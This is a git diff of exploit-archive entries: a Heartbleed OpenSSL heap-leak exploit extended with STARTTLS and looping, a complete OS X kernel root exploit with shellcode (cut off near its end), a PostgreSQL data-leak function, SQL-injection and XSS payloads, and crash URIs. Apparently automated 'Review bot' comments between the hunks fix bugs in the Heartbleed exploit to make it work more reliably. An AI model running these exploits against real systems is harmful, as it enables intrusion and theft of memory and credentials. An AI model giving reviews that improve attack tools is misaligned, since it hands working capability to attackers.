+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument("number", help="Phone number to send the crash message")
+ parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
+ args = parser.parse_args()
+
+ Debugger.enabled = args.verbose
+ main(args.number)
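Review bot: `getCredentials` opens the config at `f = open(config)` and never closes it, and the bare `except: pass` after the loop swallows every error — a config line without `=` raises IndexError at `val = prep[1].strip()` and the function silently falls through to `return 0`, which `main` then treats as missing credentials with no message. Read the file with `with open(config) as f:` and narrow the handler to what is expected, e.g. `except IndexError:` with a diagnostic. Two smaller points in the same hunk: `DEFAULT_CONFIG` is assigned twice with the same value, and `MINE_CONFIG or DEFAULT_CONFIG` in `main` always evaluates to `MINE_CONFIG` because it is a non-empty string, so the intended fallback never happens.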
diff --git a/platforms/multiple/local/32847.txt b/platforms/multiple/local/32847.txt
new file mode 100755
index 000000000..a1c22eee5
--- /dev/null
+++ b/platforms/multiple/local/32847.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/34069/info
+
+PostgreSQL is prone to an information-disclosure vulnerability.
+
+Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+PostgreSQL 8.3.6 is vulnerable; other versions may also be affected.
+
+CREATE OR REPLACE FUNCTION do_tell(anyelement)
+RETURNS bool
+COST 0.1
+VOLATILE
+LANGUAGE plpgsql
+AS $body$
+BEGIN
+raise notice 'hah: %s', $1::text;
+return true;
+END;
+$body$;
+
+SELECT * FROM restricted_view WHERE do_tell(secret_column);
\ No newline at end of file
diff --git a/platforms/multiple/remote/32791.c b/platforms/multiple/remote/32791.c
index 0c8f32c4c..6c726cb82 100755
--- a/platforms/multiple/remote/32791.c
+++ b/platforms/multiple/remote/32791.c
@@ -3,43 +3,69 @@
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
-* returned encrypted and is then decrypted, decompressed and
-* wrote to a file to annoy IDS/forensics. The exploit can set
-* the heatbeart payload length arbitrarily or use two preset
-* values for 0x00 and MAX length. The vulnerability occurs due
+* returned within encrypted SSL packets and is then decrypted
+* and wrote to a file to annoy IDS/forensics. The exploit can
+* set heartbeat payload length arbitrarily or use two preset
+* values for NULL and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
* is user supplied and returned to the user as part of DTLS/TLS
* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
* 1.0.1f are known affected. You must run this against a target
* which is linked to a vulnerable OpenSSL library using DTLS/TLS.
+* This exploit leaks upto 65532 bytes of remote heap each request
+* and can be run in a loop until the connected peer ends connection.
+* The data leaked contains 16 bytes of random padding at the end.
+* The exploit can be used against a connecting client or server,
+* it can also send pre_cmd's to plain-text services to establish
+* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
+* will often forcefully close the connection during large leak
+* requests so try to lower your payload request size.
*
* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
*
* E.g.
* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
-* $ ./heartbleed -s 192.168.11.9 -p 443 -f leakme -t 65535
+* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
-* [ connecting to 192.168.11.9 443/tcp
-* [ connected to 192.168.11.9 443/tcp
-* [ setting heartbeat payload_length to 65535
-* [ heartbeat returned type=24 length=16416
-* [ decrypting and decompressing SSL packet
+* [ connecting to 192.168.11.23 443/tcp
+* [ connected to 192.168.11.23 443/tcp
+* [ <3 <3 <3 heart bleed <3 <3 <3
+* [ heartbeat returned type=24 length=16408
+* [ decrypting SSL packet
+* [ heartbleed leaked length=65535
* [ final record type=24, length=16384
-* [ wrote 16384 bytes to file 'leakme'
+* [ wrote 16381 bytes of heap to file 'out'
+* [ heartbeat returned type=24 length=16408
+* [ decrypting SSL packet
+* [ final record type=24, length=16384
+* [ wrote 16384 bytes of heap to file 'out'
+* [ heartbeat returned type=24 length=16408
+* [ decrypting SSL packet
+* [ final record type=24, length=16384
+* [ wrote 16384 bytes of heap to file 'out'
+* [ heartbeat returned type=24 length=16408
+* [ decrypting SSL packet
+* [ final record type=24, length=16384
+* [ wrote 16384 bytes of heap to file 'out'
+* [ heartbeat returned type=24 length=42
+* [ decrypting SSL packet
+* [ final record type=24, length=18
+* [ wrote 18 bytes of heap to file 'out'
* [ done.
-* $ hexdump -C leakme
+* $ ls -al out
+* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
+* $ hexdump -C out
* - snip - snip
*
-* Added support for pre_cmd's and as an example use STARTTLS
-* to leak from vulnerable SMTP services.
-*
-* Added experimental support for exploiting connecting clients
-* with rogue server. Generate certificates with the following:
+* Use following example command to generate certificates for clients.
*
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
* -keyout server.key -out server.crt
*
+* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
+* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
+*
* todo: add udp/dtls support.
*
* - Hacker Fantastic
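Review bot: Two wording slips in the rewritten header comment: `and wrote to a file to annoy` should read `and written to a file to annoy`, and `leaks upto 65532 bytes` should read `leaks up to 65532 bytes`. The example transcript below also reports `heartbleed leaked length=65535` while the sentence above gives 65532 bytes per request as the maximum; if both figures are intended (requested length versus usable bytes after the padding the comment mentions), a parenthesis saying so would remove the apparent contradiction.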
@@ -72,6 +98,11 @@
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+int first = 0;
+int leakbytes = 0;
+int repeat = 1;
+int badpackets = 0;
+
typedef struct {
int socket;
SSL *sslHandle;
@@ -89,13 +120,11 @@ typedef struct {
void ssl_init();
void usage();
-void* heartbleed(connection*,unsigned int);
-void* sneakyleaky(connection*,char*,int);
int tcp_connect(char*,int);
int tcp_bind(char*, int);
connection* tls_connect(int);
connection* tls_bind(int);
-int pre_cmd(int,int);
+int pre_cmd(int,int,int);
void* heartbleed(connection* ,unsigned int);
void* sneakyleaky(connection* ,char*, int);
@@ -161,10 +190,15 @@ void ssl_init(){
connection* tls_connect(int sd){
connection *c;
c = malloc(sizeof(connection));
- c->socket = sd;
+ if(c==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
+ c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
- c->sslContext = SSL_CTX_new(TLSv1_client_method());
+ c->sslContext = SSL_CTX_new(SSLv23_client_method());
+ SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
c->sslHandle = SSL_new(c->sslContext);
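Review bot: The newly added `SSL_CTX_set_options(c->sslContext, ...)` in `tls_connect` is placed on the line before the existing `if(c->sslContext==NULL)` check, so a failed `SSL_CTX_new` dereferences NULL before the error is ever printed; move the call below the check, as `tls_bind` already does. The new malloc guard also terminates with `exit(0)`, which reports success to the invoking shell; `exit(1)` (or `EXIT_FAILURE`) is the conventional failure status, and the same pattern recurs in the `tls_bind` and `pre_cmd` hunks.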
@@ -186,12 +220,20 @@ connection* tls_bind(int sd){
connection *c;
char* buf;
buf = malloc(4096);
+ if(buf==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
memset(buf,0,4096);
c = malloc(sizeof(connection));
- c->socket = sd;
+ if(c==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
+ c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
- c->sslContext = SSL_CTX_new(TLSv1_server_method());
+ c->sslContext = SSL_CTX_new(SSLv23_server_method());
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
@@ -218,28 +260,51 @@ connection* tls_bind(int sd){
return c;
}
-int pre_cmd(int sd,int verbose){
+int pre_cmd(int sd,int precmd,int verbose){
/* this function can be used to send commands to a plain-text
service or client before heartbleed exploit attempt. e.g. STARTTLS */
- int rc;
+ int rc, go = 0;
char* buffer;
- char* hello = "EHLO test\n";
- char* start = "STARTTLS\n";
- buffer = malloc(2049);
- memset(buffer,0,2049);
- rc = read(sd,buffer,2048);
- printf("[ banner: %s",buffer);
- send(sd,hello,strlen(hello),0);
- memset(buffer,0,2049);
- rc = read(sd,buffer,2048);
- if(verbose==1){
- printf("%s\n",buffer);
- }
- send(sd,start,strlen(start),0);
- memset(buffer,0,2049);
- rc = read(sd,buffer,2048);
- if(verbose==1){
- printf("%s\n",buffer);
+ char* line1;
+ char* line2;
+ switch(precmd){
+ case 0:
+ line1 = "EHLO test\n";
+ line2 = "STARTTLS\n";
+ break;
+ case 1:
+ line1 = "CAPA\n";
+ line2 = "STLS\n";
+ break;
+ case 2:
+ line1 = "a001 CAPB\n";
+ line2 = "a002 STARTTLS\n";
+ break;
+ default:
+ go = 1;
+ break;
+ }
+ if(go==0){
+ buffer = malloc(2049);
+ if(buffer==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
+ memset(buffer,0,2049);
+ rc = read(sd,buffer,2048);
+ printf("[ banner: %s",buffer);
+ send(sd,line1,strlen(line1),0);
+ memset(buffer,0,2049);
+ rc = read(sd,buffer,2048);
+ if(verbose==1){
+ printf("%s\n",buffer);
+ }
+ send(sd,line2,strlen(line2),0);
+ memset(buffer,0,2049);
+ rc = read(sd,buffer,2048);
+ if(verbose==1){
+ printf("%s\n",buffer);
+ }
}
return sd;
}
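Review bot: The three read() results in the new body are stored in `rc` but never examined, so a peer that closes the socket or an error (rc of 0 or -1) prints an empty banner and the function carries on sending on a dead descriptor. Checking each one, e.g. `if(rc <= 0){ printf("[ read error during pre-command exchange\n"); exit(EXIT_FAILURE); }`, would fail early with a clear message, and the send() return values deserve the same treatment. The `go` flag exists only to skip the body for an unknown `precmd` value; `default: return sd;` inside the switch says the same thing more directly, and `buffer` is never freed once the exchange is done.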
@@ -248,7 +313,11 @@ void* heartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2);
- p = buf;
+ if(buf==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
+ p = buf;
*p++ = TLS1_HB_REQUEST;
switch(type){
case 0:
@@ -262,7 +331,7 @@ void* heartbleed(connection *c,unsigned int type){
s2n(type,p);
break;
}
- printf("[ <3 <3 <3 heart bleed <3 <3 <3 <3\n");
+ printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
OPENSSL_free(buf);
return c;
@@ -300,10 +369,19 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
n2s(p,rr->length);
if(rr->type==24){
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
+ if(rr->length > 16834){
+ printf("[ error: got a malformed TLS length.\n");
+ exit(0);
+ }
}
else{
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
+ badpackets++;
+ if(badpackets > 3){
+ printf("[ error: too many bad packets recieved\n");
+ exit(0);
+ }
goto apple;
}
}
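Review bot: The new bound `rr->length > 16834` looks like a transposition of 16384, the maximum TLS plaintext record length (OpenSSL's SSL3_RT_MAX_PLAIN_LENGTH); as written it still accepts lengths 16385–16834 that the check appears intended to reject. Using the named constant, `if(rr->length > SSL3_RT_MAX_PLAIN_LENGTH){`, makes the intent self-evident. The message on the bad-packet path misspells "received" ("recieved"), here and again in the `apple:` path of the last sneakyleaky hunk. sneakyleaky() begins and ends outside this hunk.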
@@ -312,7 +390,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
- printf("[ decrypting and decompressing SSL packet\n");
+ printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
rr->data=rr->input;
@@ -371,19 +449,56 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
}
rr->off=0;
s->packet_length=0;
- if(verbose==1){
- { unsigned int z; for (z=0; zlength; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
+ if(first==0){
+ uint heartbleed_len = 0;
+ char* fp = s->s3->rrec.data;
+ (long)fp++;
+ memcpy(&heartbleed_len,fp,2);
+ heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
+ first = 2;
+ leakbytes = heartbleed_len + 16;
+ printf("[ heartbleed leaked length=%u\n",heartbleed_len);
+ }
+ if(verbose==1){
+ { unsigned int z; for (z=0; zlength; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
+ leakbytes-=rr->length;
+ if(leakbytes > 0){
+ repeat = 1;
+ }
+ else{
+ repeat = 0;
+ }
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
- int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
- write(fd,s->s3->rrec.data,s->s3->rrec.length);
- close(fd);
- printf("[ wrote %d bytes to file '%s'\n",rr->length, filename);
- printf("[ done.\n");
- exit(0);
+ int output = s->s3->rrec.length-3;
+ if(output > 0){
+ int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
+ if(first==2){
+ first--;
+ write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
+ /* first three bytes are resp+len */
+ printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
+ }
+ else{
+ /* heap data & 16 bytes padding */
+ write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
+ printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
+ }
+ close(fd);
+ }
+ else{
+ printf("[ nothing from the heap to write\n");
+ }
+ return;
apple:
printf("[ problem handling SSL record packet - wrong type?\n");
+ badpackets++;
+ if(badpackets > 3){
+ printf("[ error: too many bad packets recieved\n");
+ exit(0);
+ }
+ return;
}
void usage(){
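Review bot: The two new bare `return;` statements (just before and just after the `apple:` label) sit in a function declared `void*`, which C does not allow — compilers reject or warn with "return with no value, in function returning non-void"; they should be `return c;` to match heartbleed(), or the prototype should become `void`. Both write() calls pass `s->s3->rrec.data+3` together with the full `s->s3->rrec.length`, so they read up to three bytes beyond the record while the first branch's message claims `length-3` bytes were written; the offset and the count should agree, and `output` already holds the `length-3` value. `(long)fp++;` is a cast whose result is discarded — plain `fp++;` is what executes — and the hand-rolled byte swap on the following line assumes a little-endian host, where `ntohs()` on the two copied bytes would be portable. sneakyleaky() starts before this hunk.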
@@ -392,8 +507,12 @@ void usage(){
printf("[ --port|-p - the port to target\n");
printf("[ --file|-f - file to write data to\n");
printf("[ --bind|-b - bind to ip for exploiting clients\n");
- printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n");
- printf("[ --type|-t - select exploit to try\n");
+ printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n");
+ printf("[ 0 = SMTP\n");
+ printf("[ 1 = POP3\n");
+ printf("[ 2 = IMAP\n");
+ printf("[ --loop|-l - loop the exploit attempts\n");
+ printf("[ --type|-t - select exploit to try\n");
printf("[ 0 = null length\n");
printf("[ 1 = max leak\n");
printf("[ n = heartbeat payload_length\n");
@@ -406,11 +525,12 @@ void usage(){
int main(int argc, char* argv[]){
int ret, port, userc, index;
- int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 0;
+ int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
+ int loop = 0;
struct hostent *h;
connection* c;
char *host, *file;
- int ihost = 0, iport = 0, ifile = 0, itype = 0;
+ int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
printf("[ =============================================================\n");
static struct option options[] = {
@@ -420,11 +540,12 @@ int main(int argc, char* argv[]){
{"type", 1, 0, 't'},
{"bind", 1, 0, 'b'},
{"verbose", 0, 0, 'v'},
- {"precmd", 0, 0, 'c'},
+ {"precmd", 1, 0, 'c'},
+ {"loop", 0, 0, 'l'},
{"help", 0, 0,'h'}
};
while(userc != -1) {
- userc = getopt_long(argc,argv,"s:p:f:t:b:cvh",options,&index);
+ userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
switch(userc) {
case -1:
break;
@@ -437,6 +558,10 @@ int main(int argc, char* argv[]){
exit(1);
}
host = malloc(strlen(optarg) + 1);
+ if(host==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
sprintf(host,"%s",optarg);
}
break;
@@ -449,6 +574,10 @@ int main(int argc, char* argv[]){
case 'f':
if(ifile==0){
file = malloc(strlen(optarg) + 1);
+ if(file==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
sprintf(file,"%s",optarg);
ifile = 1;
}
@@ -466,16 +595,26 @@ int main(int argc, char* argv[]){
if(ihost==0){
ihost = 1;
host = malloc(strlen(optarg)+1);
+ if(host==NULL){
+ printf("[ error in malloc()\n");
+ exit(0);
+ }
sprintf(host,"%s",optarg);
bind = 1;
}
break;
case 'c':
- precmd = 1;
+ if(iprecmd == 0){
+ iprecmd = 1;
+ precmd = atoi(optarg);
+ }
break;
case 'v':
verbose = 1;
break;
+ case 'l':
+ loop = 1;
+ break;
default:
break;
}
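Review bot: `precmd = atoi(optarg)` in the new 'c' case turns any non-numeric argument into 0, i.e. silently selects the SMTP pre-command, and gives no way to report a bad value. Parsing with `strtol()` plus an end-pointer check and rejecting anything outside the 0–2 range that the usage() hunk documents would make a typo fail loudly instead of running the wrong exchange. The sentinel `9` chosen as the "no pre-command" default in the earlier main() hunk deserves a named constant (e.g. `#define PRECMD_NONE 9`) so that the `default:` branch in pre_cmd() reads as deliberate rather than as a magic number.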
@@ -487,12 +626,22 @@ int main(int argc, char* argv[]){
ssl_init();
if(bind==0){
ret = tcp_connect(host, port);
- if(precmd==1){
- pre_cmd(ret, verbose);
- }
+ pre_cmd(ret, precmd, verbose);
c = tls_connect(ret);
heartbleed(c,type);
- sneakyleaky(c,file,verbose);
+ while(repeat==1){
+ sneakyleaky(c,file,verbose);
+ }
+ while(loop==1){
+ printf("[ entered heartbleed loop\n");
+ first=0;
+ repeat=1;
+ heartbleed(c,type);
+ while(repeat==1){
+ sneakyleaky(c,file,verbose);
+ }
+ }
+ printf("[ done.\n");
exit(0);
}
else{
@@ -509,13 +658,23 @@ int main(int argc, char* argv[]){
}
else{
c = tls_bind(sd);
- if(precmd==1){
- pre_cmd(ret, verbose);
- }
+ pre_cmd(ret, precmd, verbose);
heartbleed(c,type);
- sneakyleaky(c,file,verbose);
+ while(repeat==1){
+ sneakyleaky(c,file,verbose);
+ }
+ while(loop==1){
+ printf("[ entered heartbleed loop\n");
+ first=0;
+ repeat=0;
+ heartbleed(c,type);
+ while(repeat==1){
+ sneakyleaky(c,file,verbose);
+ }
+ }
+ printf("[ done.\n");
exit(0);
}
}
}
-}
+}
\ No newline at end of file
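Review bot: The bind-side loop at the end of this hunk sets `repeat=0;` before calling heartbleed(), whereas the connect-side loop in the previous hunk sets `repeat=1;`; with repeat cleared the inner `while(repeat==1)` never executes, so in --loop mode the server path never calls sneakyleaky() and `while(loop==1)` spins printing "entered heartbleed loop". This looks like a copy-and-paste slip and the line should read `repeat=1;` as in the connect path. Both loops also have no exit condition other than the process being killed, and `badpackets` is never reset between iterations, so more than three bad records accumulated across iterations terminate the process from inside sneakyleaky(). main() starts outside this hunk.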
diff --git a/platforms/multiple/remote/32839.txt b/platforms/multiple/remote/32839.txt
new file mode 100755
index 000000000..78f9ea4ae
--- /dev/null
+++ b/platforms/multiple/remote/32839.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/34001/info
+
+IBM WebSphere Application Server (WAS) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects versions prior to WAS 6.1.0.23 and 7.0.0.3.
+
+http://www.example.com/ibm/console/
+http://www.example.com/ibm/console/.jsp
diff --git a/platforms/multiple/remote/32877.txt b/platforms/multiple/remote/32877.txt
new file mode 100755
index 000000000..8ad8ad069
--- /dev/null
+++ b/platforms/multiple/remote/32877.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/34288/info
+
+Xlight FTP Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to Xlight FTP Server 3.2.1 are affected.
+
+The following example input is available:
+
+User: ' OR '1'='1' ;#
\ No newline at end of file
diff --git a/platforms/multiple/webapps/32894.txt b/platforms/multiple/webapps/32894.txt
new file mode 100755
index 000000000..a62d17677
--- /dev/null
+++ b/platforms/multiple/webapps/32894.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/34447/info
+
+IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
+
+- An HTML-injection vulnerability
+- A cross-site scripting vulnerability
+- An information-disclosure vulnerability
+- Multiple cross-site request-forgery vulnerabilities
+
+An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
+
+Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
+
+For the HTML-injection issue:
+username:
\ No newline at end of file
diff --git a/platforms/multiple/webapps/32896.html b/platforms/multiple/webapps/32896.html
new file mode 100755
index 000000000..74059f854
--- /dev/null
+++ b/platforms/multiple/webapps/32896.html
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/34447/info
+
+IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
+
+- An HTML-injection vulnerability
+- A cross-site scripting vulnerability
+- An information-disclosure vulnerability
+- Multiple cross-site request-forgery vulnerabilities
+
+An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
+
+Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/multiple/webapps/32908.txt b/platforms/multiple/webapps/32908.txt
new file mode 100755
index 000000000..956a57f65
--- /dev/null
+++ b/platforms/multiple/webapps/32908.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34513/info
+
+IBM Tivoli Continuous Data Protection for Files is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+IBM Tivoli Continuous Data Protection for Files 3.1.4.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/login/FilepathLogin.html?reason=
\ No newline at end of file
diff --git a/platforms/novell/remote/32876.txt b/platforms/novell/remote/32876.txt
new file mode 100755
index 000000000..1dff1b862
--- /dev/null
+++ b/platforms/novell/remote/32876.txt
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/34267/info
+
+Novell NetStorage is prone to the following remote vulnerabilities:
+
+- An information-disclosure vulnerability
+- A cross-site scripting vulnerability
+- A denial-of-service vulnerability
+
+Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.
+
+The following are vulnerable:
+
+NetStorage 3.1.5-19 on Open Enterprise Server (OES)
+NetStorage 2.0.1 on NetWare 6.5 SP6
+
+The following examples are available:
+
+Cross-site scripting:
+
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
+">'>
+
+Denial of service:
+
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
+/SCRIPT>">'>
+
+Information disclosure:
+
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
+/SCRIPT>">'>
\ No newline at end of file
diff --git a/platforms/osx/dos/32817.txt b/platforms/osx/dos/32817.txt
new file mode 100755
index 000000000..d4ccd553f
--- /dev/null
+++ b/platforms/osx/dos/32817.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/33909/info
+
+Apple Safari is prone to a denial-of-service vulnerability that stems from a NULL-pointer dereference.
+
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+
+Apple Safari 4 Beta is vulnerable; other versions may also be affected.
+
+The following example URIs are available:
+
+feeds:%&www.example.com/feed/
+feeds:{&www.example.com/feed/
+feeds:}&www.example.com/feed/
+feeds:^&www.example.com/feed/
+feeds:`&www.example.com/feed/
+feeds:|&www.example.com/feed/
\ No newline at end of file
diff --git a/platforms/osx/local/32813.c b/platforms/osx/local/32813.c
new file mode 100755
index 000000000..4c3c95ef9
--- /dev/null
+++ b/platforms/osx/local/32813.c
@@ -0,0 +1,163 @@
+/*
+ * Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit
+ * CVE None
+ * by Kenzley Alphonse
+ *
+ *
+ * Notes:
+ * This exploit leverage a stack overflow vulnerability to escalate privileges.
+ * The vulnerable function nfs_convert_old_nfs_args does not verify the size
+ * of a user-provided argument before copying it to the stack. As a result by
+ * passing a large size, a local user can overwrite the stack with arbitrary
+ * content.
+ *
+ * Tested on Max OS X Lion xnu-1699.22.73 (x86_64)
+ * Tested on Max OS X Lion xnu-1699.32.7 (x86_64)
+ *
+ * Greets to taviso, spender, joberheide
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+/** change these to fit your environment if needed **/
+#define SSIZE (536)
+
+/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/
+struct user_nfs_args {
+ int version; /* args structure version number */
+ char* addr __attribute__((aligned(8))); /* file server address */
+ int addrlen; /* length of address */
+ int sotype; /* Socket type */
+ int proto; /* and Protocol */
+ char * fh __attribute__((aligned(8))); /* File handle to be mounted */
+ int fhsize; /* Size, in bytes, of fh */
+ int flags; /* flags */
+ int wsize; /* write size in bytes */
+ int rsize; /* read size in bytes */
+ int readdirsize; /* readdir size in bytes */
+ int timeo; /* initial timeout in .1 secs */
+ int retrans; /* times to retry send */
+ int maxgrouplist; /* Max. size of group list */
+ int readahead; /* # of blocks to readahead */
+ int leaseterm; /* obsolete: Term (sec) of lease */
+ int deadthresh; /* obsolete: Retrans threshold */
+ char* hostname __attribute__((aligned(8))); /* server's name */
+ /* NFS_ARGSVERSION 3 ends here */
+ int acregmin; /* reg file min attr cache timeout */
+ int acregmax; /* reg file max attr cache timeout */
+ int acdirmin; /* dir min attr cache timeout */
+ int acdirmax; /* dir max attr cache timeout */
+ /* NFS_ARGSVERSION 4 ends here */
+ uint auth; /* security mechanism flavor */
+ /* NFS_ARGSVERSION 5 ends here */
+ uint deadtimeout; /* secs until unresponsive mount considered dead */
+};
+
+/** sets the uid for the current process and safely exits from the kernel**/
+static void r00t_me() {
+ asm(
+ // padding
+ "nop; nop; nop; nop;"
+
+ // task_t %rax = current_task()
+ "movq %%gs:0x00000008, %%rax;"
+ "movq 0x00000348(%%rax), %%rax;"
+
+ // proc %rax = get_bsdtask_info()
+ "movq 0x000002d8(%%rax),%%rax;"
+
+ // ucred location at proc
+ "movq 0x000000d0(%%rax),%%rax;"
+
+ // uid = 0
+ "xorl %%edi, %%edi;"
+ "movl %%edi, 0x0000001c(%%rax);"
+ "movl %%edi, 0x00000020(%%rax);"
+
+ // fix the stack pointer and return (EACCES)
+ "movq $13, %%rax;"
+ "addq $0x00000308,%%rsp;"
+ "popq %%rbx;"
+ "popq %%r12;"
+ "popq %%r13;"
+ "popq %%r14;"
+ "popq %%r15;"
+ "popq %%rbp;"
+ "ret;"
+ :::"%rax"
+ );
+}
+
+int main(int argc, char ** argv) {
+ struct user_nfs_args xdrbuf;
+ char * path;
+ char obuf[SSIZE];
+
+
+ /** clear the arguments **/
+ memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));
+ memset(obuf, 0x00, SSIZE);
+
+ /** set up variable to get path to vulnerable code **/
+ xdrbuf.version = 3;
+ xdrbuf.hostname = "localhost";
+ xdrbuf.addrlen = SSIZE;
+ xdrbuf.addr = obuf;
+
+ /** set ret address **/
+ *(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);
+ printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]);
+
+ /** create a unique tmp name **/
+ if ((path = tmpnam(NULL)) == NULL) {
+ // path can be any directory which we have read/write/exec access
+ // but I'd much rather create one instead of searching for one
+ perror("[-] tmpnam");
+ exit(EXIT_FAILURE);
+ }
+
+ /** make the path in tmp so that we can use it **/
+ if (mkdir(path, 0660) < 0) {
+ perror("[-] mkdir");
+ exit(EXIT_FAILURE);
+ }
+
+ /** inform the user that the path was created **/
+ printf("[*] created sploit path%s\n", path);
+
+ /** call the vulnerable function **/
+ if (mount("nfs", path, 0, &xdrbuf) < 0) {
+ if (errno == EACCES) {
+ puts("[+] escalating privileges...");
+ } else {
+ perror("[-] mount");
+ }
+
+ }
+
+ /** clean up tmp dir **/
+ if (rmdir(path) < 0) {
+ perror("[-] rmdir");
+ }
+
+ /** check if privs are equal to root **/
